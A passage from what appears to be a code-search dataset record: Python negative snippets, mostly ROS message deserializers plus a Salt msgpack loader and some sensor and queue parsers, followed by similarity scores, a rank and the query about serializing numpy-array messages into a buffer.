str[start:end]\n _x = self\n start = end\n end += 20\n (_x.base.cell_width, _x.base.cell_height, _x.base.position.x, _x.base.position.y, _x.base.position.z,) = _struct_5f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.base.points = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point32()\n _x = val1\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n self.base.points.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.base.intensity = struct.unpack(pattern, str[start:end])\n start = end\n end += 1\n (self.base.cost,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.base.label = str[start:end].decode('utf-8')\n else:\n self.base.label = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.mean_height, _x.mean_intensity,) = _struct_2f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def loads(msg, encoding=None, raw=False):\n try:\n\n def ext_type_decoder(code, data):\n if code == 78:\n data = salt.utils.stringutils.to_unicode(data)\n return datetime.datetime.strptime(data, \"%Y%m%dT%H:%M:%S.%f\")\n if code == 79:\n name, value = salt.utils.msgpack.loads(data, raw=False)\n return _Constant(name, value)\n return data\n\n gc.disable() # performance optimization for msgpack\n loads_kwargs = {\"use_list\": True, \"ext_hook\": ext_type_decoder}\n if salt.utils.msgpack.version >= (0, 4, 0):\n # msgpack only supports 'encoding' starting in 0.4.0.\n # Due to this, if we don't need it, don't pass it at all so\n # that under Python 2 we can still work with older versions\n # of msgpack.\n if salt.utils.msgpack.version >= (0, 5, 2):\n if encoding is None:\n loads_kwargs[\"raw\"] = True\n else:\n loads_kwargs[\"raw\"] = False\n else:\n loads_kwargs[\"encoding\"] = encoding\n try:\n ret = salt.utils.msgpack.unpackb(msg, **loads_kwargs)\n except UnicodeDecodeError:\n # msg contains binary data\n loads_kwargs.pop(\"raw\", None)\n loads_kwargs.pop(\"encoding\", None)\n ret = salt.utils.msgpack.loads(msg, **loads_kwargs)\n else:\n ret = salt.utils.msgpack.loads(msg, **loads_kwargs)\n if encoding is None and not raw:\n ret = salt.transport.frame.decode_embedded_strs(ret)\n except Exception as exc: # pylint: disable=broad-except\n log.critical(\n \"Could not deserialize msgpack message. This often happens \"\n \"when trying to read a file not in binary mode. \"\n \"To see message payload, enable debug logging and retry. \"\n \"Exception: %s\",\n exc,\n )\n log.debug(\"Msgpack deserialization failure on message: %s\", msg)\n exc_msg = \"Could not deserialize msgpack message. See log for more info.\"\n raise SaltDeserializationError(exc_msg) from exc\n finally:\n gc.enable()\n return ret", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.robot_id is None:\n self.robot_id = opil_v2.msg.Id()\n if self.agv_msg is None:\n self.agv_msg = opil_v2.msg.RobotDescriptionAGV()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.robot_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.robot_id.description = str[start:end].decode('utf-8')\n else:\n self.robot_id.description = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.agv_msg.header.seq, _x.agv_msg.header.stamp.secs, _x.agv_msg.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.agv_msg.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.agv_msg.vehicle_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vehicle_id.description = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vehicle_id.description = str[start:end]\n _x = self\n start = end\n end += 84\n (_x.agv_msg.left_size, _x.agv_msg.right_size, _x.agv_msg.front_size, _x.agv_msg.rear_size, _x.agv_msg.min_height, _x.agv_msg.max_height, _x.agv_msg.payload, _x.agv_msg.max_pos_x_vel, _x.agv_msg.max_neg_x_vel, _x.agv_msg.max_pos_x_acc, _x.agv_msg.max_neg_x_acc, _x.agv_msg.max_pos_y_vel, _x.agv_msg.max_neg_y_vel, _x.agv_msg.max_pos_y_acc, _x.agv_msg.max_neg_y_acc, _x.agv_msg.max_pos_ang_vel, _x.agv_msg.max_neg_ang_vel, _x.agv_msg.velocity_control_sensitivity, _x.agv_msg.min_turning_radius, _x.agv_msg.batt_capacity, _x.agv_msg.batt_max_voltage,) = _get_struct_21f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vehicle_type = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vehicle_type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vendor = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vendor = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.agv_msg.action_capability = []\n for i in range(0, length):\n val1 = opil_v2.msg.RobotAction()\n _x = val1\n start = end\n end += 2\n (_x.category, _x.action,) = _get_struct_2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.attributes = []\n for i in range(0, length):\n val2 = opil_v2.msg.Tuple()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.type = str[start:end].decode('utf-8')\n else:\n val2.type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.value = str[start:end].decode('utf-8')\n else:\n val2.value = str[start:end]\n val1.attributes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.description = str[start:end].decode('utf-8')\n else:\n val1.description = str[start:end]\n self.agv_msg.action_capability.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 152\n (_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret,) = _struct_2d2q14dq.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.msg = str[start:end].decode('utf-8')\n else:\n self.msg = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.p1 is None:\n self.p1 = geometry_msgs.msg.PointStamped()\n if self.p2 is None:\n self.p2 = geometry_msgs.msg.PointStamped()\n if self.p3 is None:\n self.p3 = geometry_msgs.msg.PointStamped()\n if self.p4 is None:\n self.p4 = geometry_msgs.msg.PointStamped()\n end = 0\n _x = self\n start = end\n end += 16\n (_x.s1, _x.s2, _x.s3, _x.s4, _x.p1.header.seq, _x.p1.header.stamp.secs, _x.p1.header.stamp.nsecs,) = _struct_4B3I.unpack(str[start:end])\n self.s1 = bool(self.s1)\n self.s2 = bool(self.s2)\n self.s3 = bool(self.s3)\n self.s4 = bool(self.s4)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p1.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p1.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p1.point.x, _x.p1.point.y, _x.p1.point.z, _x.p2.header.seq, _x.p2.header.stamp.secs, _x.p2.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p2.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p2.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p2.point.x, _x.p2.point.y, _x.p2.point.z, _x.p3.header.seq, _x.p3.header.stamp.secs, _x.p3.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p3.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p3.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p3.point.x, _x.p3.point.y, _x.p3.point.z, _x.p4.header.seq, _x.p4.header.stamp.secs, _x.p4.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p4.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p4.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 24\n (_x.p4.point.x, _x.p4.point.y, _x.p4.point.z,) = _struct_3d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, message):\n # Removes the random prefix\n message = message[12:]\n message = message.decode(\"utf-8\")\n\n if self.crypter:\n message = self.crypter.decrypt(message, self.expiry + 10)\n return json.loads(message)", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.polygons is None:\n self.polygons = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.polygons = []\n for i in range(0, length):\n val1 = cob_3d_mapping_msgs.msg.CurvedPolygon()\n _v2 = val1.stamp\n _x = _v2\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (val1.ID,) = _struct_I.unpack(str[start:end])\n start = end\n end += 24\n val1.parameter = _struct_6f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.score = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.SimilarityScore()\n _x = val2\n start = end\n end += 8\n (_x.ID, _x.prob,) = _struct_If.unpack(str[start:end])\n val1.score.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.polyline = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.PolylinePoint()\n _x = val2\n start = end\n end += 12\n (_x.x, _x.y, _x.edge_prob,) = _struct_3f.unpack(str[start:end])\n val1.polyline.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.features = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.Feature()\n _x = val2\n start = end\n end += 16\n (_x.x, _x.y, _x.z, _x.ID,) = _struct_3fI.unpack(str[start:end])\n val1.features.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.energy = str[start:end].decode('utf-8')\n else:\n val1.energy = str[start:end]\n start = end\n end += 4\n (val1.weight,) = _struct_f.unpack(str[start:end])\n self.polygons.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 142\n (_x.Timestamp_sec, _x.Timestamp_nsec, _x.Roll, _x.Pitch, _x.Yaw, _x.Wx, _x.Wy, _x.Wz, _x.AcelX, _x.AcelY, _x.AcelZ, _x.VelN, _x.VelE, _x.VelZ, _x.GPSLong, _x.GPSLat, _x.GPSAlt, _x.Temp, _x.IMUTime, _x.BITStatus,) = _get_struct_2i16dih().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 8\n (self.time,) = _get_struct_d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.q_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qd_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qdd_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.i_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.m_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.q_actual = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qd_actual = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.i_actual = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tool_acc_values = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tcp_force = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tool_vector = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tcp_speed = struct.unpack(pattern, str[start:end])\n start = end\n end += 8\n (self.digital_input_bits,) = _get_struct_d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_temperatures = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 24\n (_x.controller_timer, _x.test_value, _x.robot_mode,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.joint_modes = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, _x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags,) = _get_struct_I2di6h8fI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, payload: str) -> object:\n raise NotImplementedError()", "def deserialize(self, str):\n try:\n if self.accelerometer is None:\n self.accelerometer = None\n if self.gyro is None:\n self.gyro = None\n if self.orientation is None:\n self.orientation = None\n if self.led_color is None:\n self.led_color = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.name.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.position = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.velocity = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.effort = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.position_command = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.velocity_command = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.effort_command = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.accelerometer = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Vector3()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.accelerometer.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.gyro = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Vector3()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.gyro.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.orientation = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Quaternion()\n _x = val1\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n self.orientation.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.deflection = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.deflection_velocity = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_velocity = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_current = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_winding_current = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_sensor_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_winding_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_housing_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.board_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.processor_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.voltage = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.led_color = []\n for i in range(0, length):\n val1 = std_msgs.msg.ColorRGBA()\n _x = val1\n start = end\n end += 16\n (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end])\n self.led_color.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.sequence_number = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.receive_time = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.transmit_time = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.hardware_receive_time = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.hardware_transmit_time = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def from_bytes(self, bytearr):\n if len(bytearr) >= SensorMessage.BYTE_LENGTH:\n if len(bytearr) > SensorMessage.BYTE_LENGTH:\n bytearr = bytearr[:SensorMessage.BYTE_LENGTH+1]\n if bytearr[0] == \"\\xca\" and bytearr[1] == \"\\x55\":\n # Checksum checking is taken care of at RF module.\n #if self.calc_checksum(bytearr[:-1]) == ord(bytearr[-1]):\n self.address = bytearr[2:7]\n try:\n (self.errorflags,\n self.temperature,\n self.humidity,\n self.supply_v,\n self.link_quality,\n self.message_id) = struct.unpack(\">BHHHBH\", bytearr[7:17])\n except:\n print \"Failed to unpack message: \" + format_hex(bytearr[7:])\n #else:\n # raise ValueError(\"Incorrect checksum: Given: \" + repr(ord(bytearr[-1])) + \", calc.: \" + repr(self.calc_checksum(bytearr[:-1])))\n else:\n raise ValueError(\"Incorrect message header!\")", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.Class = str[start:end].decode('utf-8')\n else:\n self.Class = str[start:end]\n _x = self\n start = end\n end += 40\n (_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax,) = _get_struct_d4q().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_elem(self, elem_str):\n raise NotImplementedError()", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.red_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.red_v = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.yellow_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.yellow_v = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.green_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.green_v = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.purple_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.purple_v = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.orange_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.orange_v = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def fromString(line: Union[bytes, str]) -> SBSMessage:\n if isinstance(line, bytes):\n line = line.decode()\n\n values = line.rstrip(DELIMITER).split(\",\")\n\n if len(FieldNames) != len(values):\n raise Exception(\n \"Incorrect number of msg fields. \"\n f\"Expected {len(FieldNames)}, got {len(values)}. \"\n f\"values={values}, line={line}\"\n )\n\n attrs = {}\n for k, v in zip(FieldNames, values):\n v = v.strip() # remove any surrounding spaces\n if v:\n # perform type conversion if necessary\n if k in IntegerFields:\n v = int(v)\n elif k in FloatFields:\n v = float(v)\n elif k in BooleanFields:\n v = True if v == \"1\" else False\n elif k in DateFields:\n Y, M, D = [int(i) for i in v.split(\"/\")]\n v = datetime.date(Y, M, D)\n elif k in TimeFields:\n H, M, S = v.split(\":\")\n S, F = S.split(\".\")\n microsecond = int(int(F) * 1e3)\n v = datetime.time(\n hour=int(H), minute=int(M), second=int(S), microsecond=microsecond\n )\n # elif k in StringFields:\n # v = v.strip()\n # else:\n # # field is expected to be a string field\n # logger.warning(\n # 'Unexpected field name: {}'.format(k))\n else:\n v = None\n\n attrs[k] = v\n\n return SBSMessage(**attrs)", "def _parse_data(self, queue_msg):\r\n try:\r\n result = json.loads(queue_msg)\r\n except (TypeError, ValueError):\r\n log.error(\"External message should be a JSON serialized dict.\"\r\n \" Received queue_msg = %s\", queue_msg)\r\n raise\r\n msg = result['msg']\r\n return msg", "def decode(self, s):\n o = self._decoder.decode(s)\n return o", "def deserialize(self, data):" ]
[ "0.76323575", "0.7464221", "0.73207736", "0.7303699", "0.72687525", "0.7223702", "0.72171384", "0.71758324", "0.7169619", "0.7095711", "0.7095332", "0.70419973", "0.70292974", "0.6962802", "0.6956721", "0.69556004", "0.6943546", "0.6941993", "0.6941265", "0.69108033", "0.689487", "0.6889617", "0.6885242", "0.6837955", "0.6822721", "0.68201894", "0.68069315", "0.67525154", "0.6748329", "0.6747656", "0.67444444", "0.6744092", "0.6742832", "0.6739201", "0.6736637", "0.6728817", "0.6722638", "0.6708985", "0.6696842", "0.6675396", "0.66607225", "0.66448754", "0.6643744", "0.66237944", "0.6615946", "0.6614162", "0.65969944", "0.65817744", "0.65817744", "0.65817744", "0.6568188", "0.6555641", "0.6539042", "0.6529792", "0.6529647", "0.65244603", "0.6518788", "0.65089136", "0.6495193", "0.6490092", "0.6488001", "0.6483333", "0.6469814", "0.64678913", "0.6463568", "0.6412189", "0.63987714", "0.6397207", "0.6381565", "0.6381565", "0.6381022", "0.63631445", "0.63589054", "0.63388366", "0.633666", "0.6330338", "0.6320053", "0.63184375", "0.63048506", "0.6295488", "0.62917304", "0.62891346", "0.62757844", "0.6274322", "0.62578094", "0.6255556", "0.62524223", "0.6239478", "0.6234485", "0.6228678", "0.62200373", "0.6217964", "0.6214624", "0.62042344", "0.61982083", "0.6192605", "0.61859655", "0.61754876", "0.6163846", "0.61581445" ]
0.6215644
92
serialize message with numpy array types into buffer
